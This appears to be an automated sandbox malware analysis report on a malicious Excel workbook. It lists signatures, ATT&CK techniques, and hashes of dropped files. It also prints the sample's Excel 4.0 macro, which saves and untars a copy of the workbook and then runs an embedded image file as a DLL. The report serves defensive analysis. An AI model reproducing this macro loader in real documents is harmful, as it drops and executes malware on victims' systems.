Analysis Report f9309eba_by_Libranalysis
Overview
General Information
Detection
Score: | 72 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_MalDoc_1 | Yara detected MalDoc_1 | Joe Security |
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
Click to jump to signature section
Source: | File opened: | Jump to behavior |
Source: | Binary string: |
Software Vulnerabilities: |
---|
Document exploit detected (drops PE files) | Show sources |
Source: | File created: | Jump to dropped file |
Networking: |
---|
Yara detected MalDoc1 | Show sources |
Source: | File source: |
Source: | File created: | Jump to behavior |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: |
Office process drops PE file | Show sources |
Source: | File created: | Jump to dropped file |
Source: | Binary string: |
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: |
Source: | Window title found: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Window detected: |
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Binary string: |
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion: |
---|
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) | Show sources |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting11 | Path Interception | Path Interception | Masquerading11 | OS Credential Dumping | Security Software Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Ingress Tool Transfer1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | File and Directory Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Scripting11 | Security Account Manager | System Information Discovery1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
No Antivirus matches |
---|
Dropped Files |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | ReversingLabs |
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
No Antivirus matches |
---|
Domains and IPs |
---|
General Information |
---|
Joe Sandbox Version: | 32.0.0 Black Diamond |
Analysis ID: | 412464 |
Start date: | 12.05.2021 |
Start time: | 18:01:52 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 4m 37s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | f9309eba_by_Libranalysis (renamed file extension from none to xlsx) |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 2 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal72.troj.expl.evad.winXLSX@1/10@0/0 |
Cookbook Comments: |
|
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 185386 |
Entropy (8bit): | 7.326521161282199 |
Encrypted: | false |
SSDEEP: | 3072:0LQj2wtPO88Ew5AIsPixqYtVYeFH4ZwHrcRd7Ay2rf4KGn5hk57do:0Lex0VAIu4bVYeVHrK5AySfahk8 |
MD5: | A6E3680B30CEC6746291E55B7D9B6975 |
SHA1: | E45C3A057F840EF4C96AB8233E1E21700BBDA199 |
SHA-256: | 89934494B26BCA1A6B28C2D262392548FA12CEBDF648E5F2DCD793CBF71FB261 |
SHA-512: | FD0DE48198B51F437ADFFC5A0F12880334047D177E67D92199EFEF09F697FC0771D738B28E47EAB17FD52A772AE74CEAFABFD0F7253C526B86D5ADD4912F712B |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 647168 |
Entropy (8bit): | 6.903949816811106 |
Encrypted: | false |
SSDEEP: | 12288:uRgaHm2fjIxEh+bLlmTlEPMx4rBjVXmePxfH3KYypHKlA:2gim2fMOh+mF4NUmKYy0lA |
MD5: | C77E025AB5500D3A00B86265C73CC0B3 |
SHA1: | 83B5715406E67F33E0030C2F17991A4D4BE2CBE5 |
SHA-256: | D1FD867DD79BB803974E18598BDC97CBB8F51ACFFEB8739CE2F01DFF29985803 |
SHA-512: | BCB03E9EA06A3957D3D9C032BC10B93443ED76E102FDB147B0414BA0D60F57FFD429D5B42B8878A70D1AC5A79AF9E6F8B635574E7731D3AB9BB8248CF43A8DC3 |
Malicious: | true |
Antivirus: |
|
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 609627 |
Entropy (8bit): | 7.892549105768549 |
Encrypted: | false |
SSDEEP: | 12288:jpex0VbLbGeH+59Sja2NwZFGr9Q4ZYe/kysnOOBHVlsy3xZlHsGqXHKv:4KVbLte52a2GZFGaycOucCsGqav |
MD5: | D9FC10EA36D4BD7EE29B775CEFB677D4 |
SHA1: | 32733A2CEB144009B9013CB5D0154D202A530CEC |
SHA-256: | 047A14782F44F5AC826549CC1FB32651716A7C61E49C6A97EBA44A51F7FF5210 |
SHA-512: | F2CDD1B47DCA6048E08B44C8B5F838581293E25413F4935F7C1404634EE4E0C8B50751CD6D79736BA3B90B04FB2978DFA56726E2CFD5D25C9023AB6D24CE2A83 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.48645134363762 |
Encrypted: | false |
SSDEEP: | 12:85QdVLgXg/XAlCPCHaX2B8GB/4lX+Wnicvbf+bDtZ3YilMMEpxRljKITdJP9TdJ2:85uv/XTm6GoYeWDv3qhrNru/ |
MD5: | 46E3FA1B706BE93C1A206C7BDC3EDAB4 |
SHA1: | 4DA0C6FFFCD87ADA72D386A5D201BBD9BB0E4E71 |
SHA-256: | 1003FC597568E74F2E71E02DA51F7A63651BB22071B6558C1A18A807B9CAF08B |
SHA-512: | 91FFD9CFDA7A665192027D8742B6282773C35AAF3E8A2F0E400C207FC3727B52A79422A304B4CC12FB01DB87718F6D8E2AD0A5580C08390D997A27DE8663DBAC |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2178 |
Entropy (8bit): | 4.55521119286082 |
Encrypted: | false |
SSDEEP: | 48:8hU/XTFG5uOENrIN0OEyhQh2hU/XTFG5uOENrIN0OEyhQ/:8hU/XJG5uFCN0FyhQh2hU/XJG5uFCN0B |
MD5: | 8214CA5707AEB03E8465010483F0DD75 |
SHA1: | F54A80AB40E792AFA125CD162332A56AEFAD2D86 |
SHA-256: | 7A7943A9B6DEA376227196E29323B68F3655056020BD50599E9E9CC3B1C9DF66 |
SHA-512: | 0948BC6D7FB55981C5C4498017E7EBFF730911F257DCBF86A1EF7472F478CF5D2BFA2C6190EF9A504414A7C5FA80F195B5854206573F7F91A34F62EE2D0A2E9E |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 127 |
Entropy (8bit): | 4.64054093495956 |
Encrypted: | false |
SSDEEP: | 3:oyBVomxWInnHLoUwSLMp6lbnHLoUwSLMp6lmxWInnHLoUwSLMp6lv:dj7n7Nrn7NYn7Nf |
MD5: | C2092C2708F633B3014F688B01F8FDF2 |
SHA1: | B716B7F1FD7E81FE6A04EB388DEDBBA6915BEAC2 |
SHA-256: | 289C9CB8C053EE337E04F09158FD6029F357127A83180474F9E3147D6A0AD11A |
SHA-512: | CCB1A0CEE5C0AB7A63E9EDDFE1F0779AE45CB400C86469FC1CB37624FDAEDEF53B984DDBD6B8171F941710D7BA15AC090CC9A0AA64B1A879FAAD7C243990D14A |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 609397 |
Entropy (8bit): | 7.892473412644939 |
Encrypted: | false |
SSDEEP: | 12288:epex0VbLbGeH+59Sja2NwZFGr9Q4ZYe/kysnOOBHVlsy3xZlHsGqXHK7:hKVbLte52a2GZFGaycOucCsGqa7 |
MD5: | AAE50936F6891FF5E29E763BCA5F70B8 |
SHA1: | 69D6BCF23FAAB068CF84B24F8784A207DACF46AD |
SHA-256: | BC782FC4D49A2B97F78C0E82ECAF196931EA410A41D0C6DFECF1D4BF1DD54B14 |
SHA-512: | 283EF66BA6A5864F49B335B36E91A6BC316CDB688FA2FFD56E0E9D4192C325F998B28FAF4D80ED3DD2CA98E7A0B27D88C49DD8FEB4845F78B8E9CC8855EE0697 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 165 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fV:vBFFGS |
MD5: | 797869BB881CFBCDAC2064F92B26E46F |
SHA1: | 61C1B8FBF505956A77E9A79CE74EF5E281B01F4B |
SHA-256: | D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185 |
SHA-512: | 1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS |
MD5: | 96114D75E30EBD26B572C1FC83D1D02E |
SHA1: | A44EEBDA5EB09862AC46346227F06F8CFAF19407 |
SHA-256: | 0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523 |
SHA-512: | 52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0 |
Malicious: | true |
Reputation: | high, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 609397 |
Entropy (8bit): | 7.892473412644939 |
Encrypted: | false |
SSDEEP: | 12288:epex0VbLbGeH+59Sja2NwZFGr9Q4ZYe/kysnOOBHVlsy3xZlHsGqXHK7:hKVbLte52a2GZFGaycOucCsGqa7 |
MD5: | AAE50936F6891FF5E29E763BCA5F70B8 |
SHA1: | 69D6BCF23FAAB068CF84B24F8784A207DACF46AD |
SHA-256: | BC782FC4D49A2B97F78C0E82ECAF196931EA410A41D0C6DFECF1D4BF1DD54B14 |
SHA-512: | 283EF66BA6A5864F49B335B36E91A6BC316CDB688FA2FFD56E0E9D4192C325F998B28FAF4D80ED3DD2CA98E7A0B27D88C49DD8FEB4845F78B8E9CC8855EE0697 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.891709774410967 |
TrID: |
|
File name: | f9309eba_by_Libranalysis.xlsx |
File size: | 607568 |
MD5: | f9309ebadd3f4d1e665dfe567dbf9a25 |
SHA1: | 7cd5c8f8038217c20e09fd455fb5708185b151f9 |
SHA256: | 7d2fd957a301aeea8014fd95a0902a6c45a568d34f4a1ce9d7a9fd38b53b542c |
SHA512: | b0a6e900343c7f63cf41d97d75ad9b0db4c63e937cbeec825bb5b6ae168cc34b907abc180ebbcc04104d575497232f79bff3a498bf9468c748f4d21d5670eec3 |
SSDEEP: | 12288:jpex0VbLbGeH+59SjNGst3hglv595+6tLAJVX0cfxBNtsY69bWed0t:jUKVbLte52dt3i/+mAJ2gsY6oe2 |
File Content Preview: | PK..........!.........3.......[Content_Types].xml ...(......................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4e2aa8aa4b4bcb4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "f9309eba_by_Libranalysis.xlsx" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
,,,"=SAVE.COPY.AS(""..\Nioka.meposv"")",run,,,,,,,dll32 ..\xl\media\im,,,,,,"=EXEC(""tar -xf ..\Nioka.meposv -C ..\"")=PI()=PI()=PI()","age2.bmp,StartW",,,,,,,,,,,,,,,,,,,,"=WAIT(NOW()+""00:00:06"")",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=PI()=PI()=PI()=EXEC(AL701&AL702&AL703)=PI()=PI()=PI(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,
Network Behavior |
---|
No network behavior found |
---|
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Click to jump to process
Memory Usage |
---|
Click to jump to process
High Level Behavior Distribution |
---|
back
Click to dive into process behavior distribution
System Behavior |
---|
General |
---|
Start time: | 18:02:42 |
Start date: | 12/05/2021 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f930000 |
File size: | 27641504 bytes |
MD5 hash: | 5FB0A0F93382ECD19F5F499A5CAA59F0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|